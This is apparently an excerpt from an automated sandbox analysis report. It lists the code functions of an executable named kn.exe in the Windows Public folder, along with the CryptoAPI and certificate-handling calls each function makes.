      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B5BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF67C4B5BA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,6_2_00007FF67C57FB94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C587B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,6_2_00007FF67C587B60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51BB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C51BB38
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C585B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,6_2_00007FF67C585B44
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,6_2_00007FF67C58BB50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55FB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,6_2_00007FF67C55FB50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C50FC34
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF67C4EFC20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D9BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,6_2_00007FF67C4D9BC8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C553BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C553BEB
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55BBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF67C55BBC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C541C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,6_2_00007FF67C541C84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F1C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,6_2_00007FF67C4F1C50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B5C54 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF67C5B5C54
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C503C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF67C503C60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C56DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,6_2_00007FF67C56DD1C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57FD2C CryptDecryptMessage,GetLastError,#357,6_2_00007FF67C57FD2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C545CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,6_2_00007FF67C545CE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C589580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,6_2_00007FF67C589580
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C553590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C553590
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,6_2_00007FF67C51B55C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57F570 CryptHashCertificate,SetLastError,6_2_00007FF67C57F570
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5395FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,6_2_00007FF67C5395FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DF630 CryptAcquireContextW,GetLastError,#357,SetLastError,6_2_00007FF67C4DF630
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DD5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4DD5C2
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5155F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,6_2_00007FF67C5155F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C56D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,6_2_00007FF67C56D6A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5076B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF67C5076B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C579688 CryptFindOIDInfo,#357,#360,#360,#360,6_2_00007FF67C579688
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,6_2_00007FF67C53B664
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,6_2_00007FF67C52366C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C54F644
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C5664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,6_2_00007FF67C4C5664
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DD660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,6_2_00007FF67C4DD660
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C553654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF67C553654
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57F650 CryptHashCertificate2,SetLastError,6_2_00007FF67C57F650
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,6_2_00007FF67C53F6D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5536E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C5536E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4ED790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,6_2_00007FF67C4ED790
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5537A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C5537A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4CB788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,6_2_00007FF67C4CB788
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52577C #360,#358,CryptDecodeObject,GetLastError,#357,6_2_00007FF67C52577C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C56B794 CryptExportPublicKeyInfoEx,SetLastError,6_2_00007FF67C56B794
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C555768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C555768
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,6_2_00007FF67C51F774
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,6_2_00007FF67C57D750
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EF810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF67C4EF810
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,6_2_00007FF67C57F7FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,6_2_00007FF67C53B808
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F17D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,6_2_00007FF67C4F17D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5697E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,6_2_00007FF67C5697E4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5898B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF67C5898B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E7884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,6_2_00007FF67C4E7884
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C529878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,6_2_00007FF67C529878
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C553860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C553860
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF67C54184C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53D850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,6_2_00007FF67C53D850
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,6_2_00007FF67C55391C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,6_2_00007FF67C57F918
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C38FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF67C4C38FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D3918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4D3918
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5218DC CertFindExtension,CryptDecodeObject,GetLastError,#357,6_2_00007FF67C5218DC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53B8D0 I_CryptGetLruEntryData,#357,6_2_00007FF67C53B8D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5251A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,6_2_00007FF67C5251A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C587178 BCryptCloseAlgorithmProvider,#360,6_2_00007FF67C587178
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C533188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,6_2_00007FF67C533188
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C535164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF67C535164
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,6_2_00007FF67C53F168
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A9208 #357,NCryptEnumKeys,#360,#358,6_2_00007FF67C5A9208
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C587214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,6_2_00007FF67C587214
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5531C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF67C5531C0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5871C8 BCryptDestroyKey,#360,6_2_00007FF67C5871C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5511C8 NCryptVerifySignature,#205,#357,#357,#357,#357,6_2_00007FF67C5511C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5532A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF67C5532A8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,6_2_00007FF67C51B2B4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,6_2_00007FF67C57D28C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C587290 NCryptIsKeyHandle,#359,#360,#357,#358,6_2_00007FF67C587290
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4ED240 #357,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF67C4ED240
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4ED304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4ED304
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EB324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,6_2_00007FF67C4EB324
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,6_2_00007FF67C53D30C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5292D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,6_2_00007FF67C5292D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54F2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C54F2F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5192C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,6_2_00007FF67C5192C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5332D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF67C5332D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,6_2_00007FF67C58739C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5893A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF67C5893A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5333A0 CryptVerifyCertificateSignature,CertCompareCertificateName,6_2_00007FF67C5333A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5633B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,6_2_00007FF67C5633B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C553390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF67C553390
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E7340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,6_2_00007FF67C4E7340
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C515338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF67C515338
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DB36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,6_2_00007FF67C4DB36C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,6_2_00007FF67C50B350
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF67C58141C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C55342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C55342C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF67C53B3D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5353E8 CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF67C5353E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5113F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,6_2_00007FF67C5113F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57F4A0 CryptHashPublicKeyInfo,SetLastError,6_2_00007FF67C57F4A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C559480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C559480
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53F488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,6_2_00007FF67C53F488
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C56B464 CryptEncodeObjectEx,SetLastError,6_2_00007FF67C56B464
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B5438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF67C4B5438
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5534F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF67C5534F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C513504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,6_2_00007FF67C513504
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C56B4EC CryptDecodeObjectEx,SetLastError,6_2_00007FF67C56B4EC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5814F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,6_2_00007FF67C5814F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C582DAC #357,#357,CryptFindOIDInfo,LocalFree,6_2_00007FF67C582DAC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586D78 NCryptOpenKey,#360,6_2_00007FF67C586D78
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C552D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF67C552D78
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C550D84 NCryptFreeObject,#205,#357,6_2_00007FF67C550D84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E0E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4E0E24
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C534DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF67C534DDC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C586DE0 NCryptCreatePersistedKey,#360,6_2_00007FF67C586DE0
